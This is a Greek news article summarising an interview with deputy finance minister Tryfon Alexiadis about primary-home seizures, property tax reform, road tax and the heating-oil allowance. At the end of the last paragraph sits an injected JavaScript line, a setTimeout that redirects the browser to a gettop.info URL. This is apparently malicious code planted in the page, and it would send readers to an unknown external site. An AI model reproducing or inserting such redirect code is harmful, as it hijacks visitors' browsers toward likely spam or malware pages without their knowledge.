Αλεξιάδης: Δεν θα έχουμε κατάσχεση α’ κατοικίας για χρέη στο Δημόσιο

0
12

 

Αποκαλυπτικός ήταν ο αναπληρωτής υπουργός Οικονομικών, Τρύφων Αλεξιάδης, μιλώντας στην πρωινή εκπομπή του ΑΝΤ1. Στη συνέντευξη που παραχώρησε, ο κ. Αλεξιάδης ξεκαθάρισε πως η κυβέρνηση «κληρονόμησε» ένα άδικο φορολογικό σύστημα, αλλά έχει μία συμφωνία που έχει ψηφιστεί και πρέπει να την υλοποιήσει.

«Μέχρι να το αλλάξουμε, πρέπει να το υποστούμε», είπε χαρακτηριστικά. Συμπλήρωσε πως «εάν δεν πιάσουμε αυτούς τους στόχους του Προϋπολογισμού, θα έχουμε άλλες επιπτώσεις», αναφερόμενος ουσιαστικά στον περιβόητο «κόφτη».

Ο αναπληρωτής υπουργός Οικονομικών επεσήμανε πως αποδίδουν καρπούς οι έλεγχοι για την πάταξη του λαθρεμπορίου και της φοροδιαφυγής, οι οποίοι έχουν εντατικοποιηθεί. «Έχουν ξεκινήσει δράσεις, που τόσα χρόνια παρέμεναν… στα χαρτιά», σημείωσε.

Όσον αφορά στο επίδομα πετρελαίου θέρμανσης, ο κ. Αλεξιάδης ανέφερε πως θα υπάρχει και φέτος, αλλά το σχετικό σχέδιο θα οριστικοποιηθεί μετά την επιστροφή Τσακαλώτου-Χουλιαράκη από την Ουάσινγκτον.

Αναφορικά με τις αποδείξεις, ξεκαθάρισε πως αυτήν τη στιγμή δεν υπάρχει υποχρέωση για τη συλλογή και προσκόμισή τους.

Ερωτηθείς για την “έκρηξη” στους πλειστηριασμούς, ο Τρύφων Αλεξιάδης δήλωσε κατηγορηματικά πως «δεν υπάρχει περίπτωση να έχουμε κατάσχεση α΄ κατοικίας για χρέη προς το Δημόσιο».

Τα τέλη κυκλοφορίας του 2017 θα είναι πιο δίκαια και πιο αναλογικά σε σχέση με την προηγούμενη χρονιά, δεσμεύτηκε, προθέτοντας ότι στόχος είναι να μην επιβαρύνουμε υπέρμετρα τα παλιά αυτοκίνητα σε σχέση με την αντικειμενική τους αξία.

«Αστικούς μύθους» χαρακτήρισε όσα κατά καιρούς έχουν γραφτεί και ακουστεί για το τι θα περιλαμβάνει το νέο περιουσιολόγιο. Ο κ. Αλεξιάδης υποστήριξε πως στόχος είναι η καταγραφή των περιουσιακών στοιχείων και ξεκαθάρισε πως «δεν υπάρχει περίπτωση μετά από αυτό να βάλουμε φόρο στο σύνολο της περιουσίας».

Ο αναπληρωτής υπουργός Οικονομικών ανέφερε πως καταβάλλονται προσπάθειες για να γίνεται αυτόματα ο συμψηφισμός οφειλών και επιστροφής φόρων, αλλά για την ώρα δεν υπάρχει αυτή η δυνατότητα.

Σχετικά με τον φόρο στην ακίνητη περιουσία, ο κ. Αλεξιάδης τόνισε πως η κυβέρνηση επεξεργάζεται έναν πιο δίκαιο φόρο, που θα αντικαταστήσει τον ΕΝΦΙΑ. «Τελειώνουν οι αντικειμενικές αξίες, θέλουμε να πάμε σε ένα σύστημα εμπορικών αξιών», είπε και εκτίμησε πως θα γίνει μέσα στο 2017. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here